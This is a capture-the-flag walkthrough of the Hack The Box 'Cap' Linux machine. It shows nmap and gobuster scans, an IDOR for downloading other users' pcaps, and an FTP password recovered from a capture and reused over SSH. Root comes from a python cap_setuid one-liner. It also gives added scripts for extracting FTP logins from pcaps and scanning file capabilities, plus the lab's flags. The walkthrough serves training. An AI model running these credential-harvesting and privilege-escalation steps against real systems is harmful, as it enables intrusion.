Cap

About this machine: HTB

Operating System: Linux

Skills used:

  • ssh

  • IDOR on /data (downloading other users' pcaps)

  • suid / capabilities (cap_setuid)

First scan:

nmap -p- --open -sS -T4 -Pn -n 10.10.10.245 -oN First_Scan

PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Version and service scan:

nmap -p21,22,80 -sS -T4 -n -sVC 10.10.10.245 -oN SVC_Scann
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-27 22:50 EDT
Stats: 0:01:27 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 22:53 (0:00:43 remaining)
Stats: 0:01:32 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 22:53 (0:00:46 remaining)
Nmap scan report for 10.10.10.245
Host is up (0.15s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    gunicorn
|_http-title: Security Dashboard
|_http-server-header: gunicorn
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Wed, 28 May 2025 02:51:01 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     404 Not Found
|     Not Found
|     The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Wed, 28 May 2025 02:50:55 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 19386
|     Security Dashboard
|     <!-- amchar
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Wed, 28 May 2025 02:50:56 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Allow: GET, HEAD, OPTIONS
|     Content-Length: 0
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 196
|     Bad Request
|     Bad Request
|_    Invalid HTTP Version 'Invalid HTTP Version: 'RTSP/1.0''
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.94SVN%I=7%D=5/27%Time=68367A11%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,15B4,"HTTP/1.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:
SF:x20Wed,\x2028\x20May\x202025\x2002:50:55\x20GMT\r\nConnection:\x20close
SF:\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20
SF:19386\r\n\r\n\n<html\x20class="no-js"\x20lang="en
SF:">\n\n\n\x20\x20\x20\x20<meta\x20charset="utf-8">\n\x20\x20\x20
SF:\x20<meta\x20http-equiv="x-ua-compatible"\x20content="ie=edge">\n\x
SF:20\x20\x20\x20Security\x20Dashboard\n\x20\x20\x20\x20<me
SF:ta\x20name="viewport"\x20content="width=device-width,\x20initial-sca
SF:le=1">\n\x20\x20\x20\x20<link\x20rel="shortcut\x20icon"\x20type="im
SF:age/png"\x20href="/static/images/icon/favicon.ico">\n\x20\x20\x20\x
SF:20<link\x20rel="stylesheet"\x20href="/static/css/bootstrap.min.css
SF:">\n\x20\x20\x20\x20<link\x20rel="stylesheet"\x20href="/static/css/
SF:font-awesome.min.css">\n\x20\x20\x20\x20<link\x20rel="stylesheet"
SF:x20href="/static/css/themify-icons.css">\n\x20\x20\x20\x20<link\x20r
SF:el="stylesheet"\x20href="/static/css/metisMenu.css">\n\x20\x20\x20
SF:\x20<link\x20rel="stylesheet"\x20href="/static/css/owl.carousel.mi
SF:n.css">\n\x20\x20\x20\x20<link\x20rel="stylesheet"\x20href="/stati
SF:c/css/slicknav.min.css">\n\x20\x20\x20\x20<!--\x20amchar")%r(HTTPOpt
SF:ions,B3,"HTTP/1.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\x20Wed,
SF:\x2028\x20May\x202025\x2002:50:56\x20GMT\r\nConnection:\x20close\r\nCon
SF:tent-Type:\x20text/html;\x20charset=utf-8\r\nAllow:\x20GET,\x20HEAD,\x2
SF:0OPTIONS\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest,121,"HTTP/1.1
SF:\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\nContent-Type:\x20t
SF:ext/html\r\nContent-Length:\x20196\r\n\r\n\n\x20\x20\n\x20
SF:x20\x20\x20Bad\x20Request\n\x20\x20\n\x20\x20\n\x20\x20\x20\x20Bad\x20Request\n\x20\x20\x20\x20Inv
SF:alid\x20HTTP\x20Version\x20'Invalid\x20HTTP\x20Version:\x20'R
SF:TSP/1.0''\n\x20\x20\n\n")%r(FourOhFourRequest,
SF:189,"HTTP/1.0\x20404\x20NOT\x20FOUND\r\nServer:\x20gunicorn\r\nDate:\x
SF:20Wed,\x2028\x20May\x202025\x2002:51:01\x20GMT\r\nConnection:\x20close
SF:r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x202
SF:32\r\n\r\n404\x20Not\x20FoundNot\x20Found</
SF:h1>The\x20requested\x20URL\x20was\x20not\x20found\x20on\x20the\x20
SF:server.\x20If\x20you\x20entered\x20the\x20URL\x20manually\x20please\x2
SF:0check\x20your\x20spelling\x20and\x20try\x20again.\n");
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

So we have vsftpd 3.0.3 on 21, OpenSSH 8.2p1 on 22 and, on 80, a Python web app served by gunicorn with the title "Security Dashboard". Let's see what is running on port 80:

(screenshot)

We enumerate the web app with whatweb:

whatweb 10.10.10.245
http://10.10.10.245 [200 OK] Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[gunicorn], IP[10.10.10.245], JQuery[2.2.4], Modernizr[2.8.3.min], Script, Title[Security Dashboard], X-UA-Compatible[ie=edge]

We enumerate directories with gobuster:

gobuster dir -u "http://10.10.10.245/" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20
Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:                     http://10.10.10.245/
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
Starting gobuster in directory enumeration mode
/data                 (Status: 302) [Size: 208] [--> http://10.10.10.245/]
/ip                   (Status: 200) [Size: 17447]
/netstat              (Status: 200) [Size: 33531]
/capture              (Status: 302) [Size: 220] [--> http://10.10.10.245/data/1]

/capture redirects to /data/1, and the number in that path is the id of a stored capture. The application never checks whether the capture belongs to the user asking for it, so after playing with the value of the id for a while we realise that captures made by other users can be downloaded (a classic IDOR). We download the pcap from the dashboard and analyse it with Wireshark:

(screenshots)

The capture contains an FTP session from the user nathan to the target machine. FTP sends credentials in cleartext, so the USER and PASS commands reveal his password. SSH is open on the same box and the password is likely to be reused, so we try it over SSH:

password: Buck3tH4TF0RM3!
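Wireshark's "Follow TCP Stream" is the quick way to read the FTP login, but the same check is easy to script so it can be run over every capture pulled from /data/<id>. The following is an added example for this writeup, not code from the original page: a minimal reader for classic libpcap files (magic 0xa1b2c3d4, Ethernet link type, IPv4/TCP inside, which is what the dashboard serves; pcapng is not handled) that pairs each USER command with the PASS that follows it on the same client connection. The sample capture produced by build_sample_pcap() is constructed here for the demo and uses documentation addresses, not the real capture from the box.

```python
"""Pull FTP logins out of a pcap without Wireshark.

Added example for this writeup; it is not code from the original page. It
assumes a classic libpcap file (magic 0xa1b2c3d4 in either byte order, link
type Ethernet, IPv4/TCP inside); pcapng captures would need a different
reader. build_sample_pcap() fabricates a small capture for the demo.
"""
import struct
import sys


def _packets(data: bytes):
    """Yield the raw frames of a classic pcap blob."""
    if data[:4] == b"\xd4\xc3\xb2\xa1":
        end = "<"
    elif data[:4] == b"\xa1\xb2\xc3\xd4":
        end = ">"
    else:
        raise ValueError("not a classic pcap (pcapng is not supported here)")
    if struct.unpack(end + "I", data[20:24])[0] != 1:  # DLT_EN10MB
        raise ValueError("only the Ethernet link type is handled")
    off = 24
    while off + 16 <= len(data):
        _sec, _usec, incl_len, _orig = struct.unpack(end + "IIII", data[off:off + 16])
        off += 16
        yield data[off:off + incl_len]
        off += incl_len


def _tcp(frame: bytes):
    """Return (src, sport, dst, dport, payload) for an Ethernet/IPv4/TCP frame, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
        return None
    ihl = (frame[14] & 0x0F) * 4
    total = struct.unpack("!H", frame[16:18])[0]
    src = ".".join(map(str, frame[26:30]))
    dst = ".".join(map(str, frame[30:34]))
    seg = frame[14 + ihl:14 + total]
    if len(seg) < 20:
        return None
    sport, dport = struct.unpack("!HH", seg[:4])
    doff = (seg[12] >> 4) * 4
    return src, sport, dst, dport, seg[doff:]


def extract_ftp_logins(pcap: bytes, ftp_port: int = 21):
    """Return [(client, server, user, password)] for every USER/PASS pair sent to ftp_port."""
    pending = {}  # (client, sport) -> username waiting for its PASS
    found = []
    for frame in _packets(pcap):
        parsed = _tcp(frame)
        if parsed is None:
            continue
        src, sport, dst, dport, payload = parsed
        if dport != ftp_port or not payload:
            continue  # only client -> server control traffic carries credentials
        for line in payload.decode("latin-1").splitlines():
            verb, _, arg = line.partition(" ")
            if verb.upper() == "USER":
                pending[(src, sport)] = arg.strip()
            elif verb.upper() == "PASS" and (src, sport) in pending:
                found.append((src, dst, pending.pop((src, sport)), arg.strip()))
    return found


def _frame(src, sport, dst, dport, payload):
    """Build a minimal Ethernet/IPv4/TCP frame (checksums left zero; the parser ignores them)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    return b"\x02" * 6 + b"\x04" * 6 + b"\x08\x00" + ip + tcp


def build_sample_pcap() -> bytes:
    """Constructed capture: an FTP login plus a server banner and an unrelated HTTP request."""
    client, server = "192.0.2.10", "192.0.2.20"  # documentation addresses, not the real capture
    flows = [
        (server, 21, client, 54321, b"220 (vsFTPd 3.0.3)\r\n"),
        (client, 54321, server, 21, b"USER nathan\r\n"),
        (server, 21, client, 54321, b"331 Please specify the password.\r\n"),
        (client, 54321, server, 21, b"PASS Buck3tH4TF0RM3!\r\n"),
        (client, 54322, server, 80, b"GET /data/1 HTTP/1.1\r\n\r\n"),
    ]
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, (s, sp, d, dp, pl) in enumerate(flows):
        fr = _frame(s, sp, d, dp, pl)
        out += struct.pack("<IIII", 1700000000 + i, 0, len(fr), len(fr)) + fr
    return out


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pcap()
    for client, server, user, password in extract_ftp_logins(data):
        print(f"{client} -> {server}: {user} / {password}")
```

Run it with a downloaded capture as the argument (`python3 ftp_creds.py 0.pcap`) or with no argument to see it work on the constructed sample. Only segments addressed to the FTP port are inspected, so the server's replies and any other protocol in the capture are ignored, and USER without a matching PASS on the same connection is never reported.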

User: nathan

ssh nathan@10.10.10.245
nathan@10.10.10.245's password: Buck3tH4TF0RM3!

We are in. Now we look for the first flag:

nathan@cap:~$ dir
user.txt
nathan@cap:~$ cat user.txt
438f3ccb2df866d897564dc57ac81bda

We list SUID binaries owned by root to see whether any of them can be used to escalate privileges:

find / -perm -4000 -user root 2>/dev/null | xargs ls -l
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/su
/usr/bin/fusermount
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/snap/snapd/11841/usr/lib/snapd/snap-confine
/snap/snapd/12398/usr/lib/snapd/snap-confine
/snap/core18/2066/bin/mount
/snap/core18/2066/bin/ping
/snap/core18/2066/bin/su
/snap/core18/2066/bin/umount
/snap/core18/2066/usr/bin/chfn
/snap/core18/2066/usr/bin/chsh
/snap/core18/2066/usr/bin/gpasswd
/snap/core18/2066/usr/bin/newgrp
/snap/core18/2066/usr/bin/passwd
/snap/core18/2066/usr/bin/sudo
/snap/core18/2066/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/2066/usr/lib/openssh/ssh-keysign
/snap/core18/2074/bin/mount
/snap/core18/2074/bin/ping
/snap/core18/2074/bin/su
/snap/core18/2074/bin/umount
/snap/core18/2074/usr/bin/chfn
/snap/core18/2074/usr/bin/chsh
/snap/core18/2074/usr/bin/gpasswd
/snap/core18/2074/usr/bin/newgrp
/snap/core18/2074/usr/bin/passwd
/snap/core18/2074/usr/bin/sudo
/snap/core18/2074/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/2074/usr/lib/openssh/ssh-keysign

That is a long list, but every entry is a stock Ubuntu or snap binary, so nothing stands out. SUID is not the only way a file can carry privilege: Linux file capabilities are stored as an xattr and do not show up in the find above, so we check them with getcap:

nathan@cap:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

The ping, traceroute and gst-ptp-helper entries are normal, but /usr/bin/python3.8 has cap_setuid in its effective and permitted sets (+eip). That capability lets a process change its UID without being root, so anyone who can run the interpreter can call setuid(0) and spawn a root shell. GTFOBins documents exactly this for python under Capabilities: https://gtfobins.github.io/gtfobins/python/#capabilities

We run the GTFOBins capabilities payload for python:

nathan@cap:~$ cp /usr/bin/python3.8 .
nathan@cap:~$ python3.8 -c 'import os; os.setuid(0); os.system("bash")'
root@cap:~#

One caveat on the first line: the cp comes from the GTFOBins template and is not what makes this work. A plain cp does not preserve the security.capability xattr, so the copy in the home directory has no capabilities at all; the payload succeeds because `python3.8` (without ./) resolves through PATH to /usr/bin/python3.8, which is the binary that actually carries cap_setuid.
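getcap is just reading and decoding the security.capability xattr on each file, which is worth knowing when the box has no libcap tools or when you want to triage the results automatically. The block below is an added example for this writeup, not code from the page or from libcap: decode_vfs_cap() parses the raw xattr (struct vfs_cap_data revision 2 or 3 from linux/capability.h) into the same text getcap prints, scan_file_caps() walks a tree the way `getcap -r` does and flags capabilities that typically lead straight to root, and the SAMPLE_* byte strings are constructed here to mirror the three kinds of getcap lines seen on Cap rather than read from a real filesystem. Scanning needs Linux (os.getxattr); decoding runs anywhere.

```python
"""Find and decode file capabilities the way `getcap -r /` does.

Added example for this writeup; it is not code from the page or from libcap.
The SAMPLE_* blobs are constructed to match the getcap lines from the box.
"""
import os
import struct

CAP_NAMES = [
    "chown", "dac_override", "dac_read_search", "fowner", "fsetid", "kill",
    "setgid", "setuid", "setpcap", "linux_immutable", "net_bind_service",
    "net_broadcast", "net_admin", "net_raw", "ipc_lock", "ipc_owner",
    "sys_module", "sys_rawio", "sys_chroot", "sys_ptrace", "sys_pacct",
    "sys_admin", "sys_boot", "sys_nice", "sys_resource", "sys_time",
    "sys_tty_config", "mknod", "lease", "audit_write", "audit_control",
    "setfcap", "mac_override", "mac_admin", "syslog", "wake_alarm",
    "block_suspend", "audit_read", "perfmon", "bpf", "checkpoint_restore",
]
# Capabilities that hand over root, or a short path to it, when a normal user can run the file.
DANGEROUS = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search", "cap_chown",
             "cap_fowner", "cap_setfcap", "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module"}

VFS_CAP_REVISION_MASK = 0xFF000000
VFS_CAP_FLAGS_EFFECTIVE = 0x000001
VFS_CAP_SIZES = {0x02000000: 20, 0x03000000: 24}  # v3 appends a rootid for user namespaces


def decode_vfs_cap(blob: bytes) -> str:
    """Render a security.capability value like getcap, e.g. 'cap_setuid,cap_net_bind_service+eip'."""
    magic_etc = struct.unpack("<I", blob[:4])[0]
    rev = magic_etc & VFS_CAP_REVISION_MASK
    if rev not in VFS_CAP_SIZES or len(blob) != VFS_CAP_SIZES[rev]:
        raise ValueError(f"unsupported vfs_cap_data revision {rev:#x} or bad length {len(blob)}")
    # data[0] holds caps 0-31, data[1] caps 32-63, each as (permitted, inheritable)
    p_lo, i_lo, p_hi, i_hi = struct.unpack("<IIII", blob[4:20])
    permitted = p_lo | (p_hi << 32)
    inheritable = i_lo | (i_hi << 32)
    # the effective bit in magic_etc makes every permitted cap effective at exec
    effective = permitted if magic_etc & VFS_CAP_FLAGS_EFFECTIVE else 0
    groups = {}  # flag letters -> cap names, in ascending cap number like libcap
    for n, name in enumerate(CAP_NAMES):
        bit = 1 << n
        flags = "".join(f for f, s in (("e", effective), ("i", inheritable), ("p", permitted)) if s & bit)
        if flags:
            groups.setdefault(flags, []).append("cap_" + name)
    return " ".join(f"{','.join(names)}+{flags}" for flags, names in groups.items())


def is_dangerous(cap_text: str) -> bool:
    """True if any capability in a getcap-style string is in DANGEROUS."""
    names = {n for grp in cap_text.split() for n in grp.split("+")[0].split(",")}
    return bool(names & DANGEROUS)


def scan_file_caps(root: str = "/"):
    """Walk root like `getcap -r` (Linux only) and yield (path, cap_text, dangerous)."""
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath.startswith(("/proc", "/sys", "/dev")):
            dirnames[:] = []  # pseudo filesystems: nothing to find, lots to wait for
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                blob = os.getxattr(path, "security.capability", follow_symlinks=False)
            except OSError:  # ENODATA (no caps), EACCES, ENOTSUP ...
                continue
            text = decode_vfs_cap(blob)
            yield path, text, is_dangerous(text)


# Constructed xattr values matching the getcap output on Cap (v2 for the first two, v3 for the last).
SAMPLE_PYTHON38 = b"\x01\x00\x00\x02" + b"\x80\x04\x00\x00" * 2 + b"\x00" * 8
SAMPLE_PING = b"\x01\x00\x00\x02" + b"\x00\x20\x00\x00" + b"\x00" * 12
SAMPLE_GST_PTP = b"\x01\x00\x00\x03" + b"\x00\x14\x00\x00" + b"\x00" * 16

if __name__ == "__main__":
    for blob in (SAMPLE_PYTHON38, SAMPLE_PING, SAMPLE_GST_PTP):
        text = decode_vfs_cap(blob)
        print(f"{text:50} dangerous={is_dangerous(text)}")
    if hasattr(os, "getxattr"):
        for path, text, bad in scan_file_caps("/usr/bin"):
            print(f"{path} = {text}" + ("   <-- look here" if bad else ""))
```

Two things the decoder makes visible. First, the "+e" on python3.8 is a single bit in magic_etc, not a per-capability flag: when it is set, every permitted capability becomes effective at exec, so the interpreter starts with cap_setuid already usable and os.setuid(0) needs no further steps. Second, the value lives in an xattr on the specific inode, which is why copying the binary elsewhere yields a file with no capabilities and why tools like find -perm never see it; a capability audit has to read the xattr, as getcap and the scanner above do.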

We are root. Now we look for the last flag:

root@cap:~# cd /root
root@cap:/root# ls
root.txt  snap
root@cap:/root# cat root.txt
57f1acc1d93f29a521f08d3777308093

And with that we finish this machine.
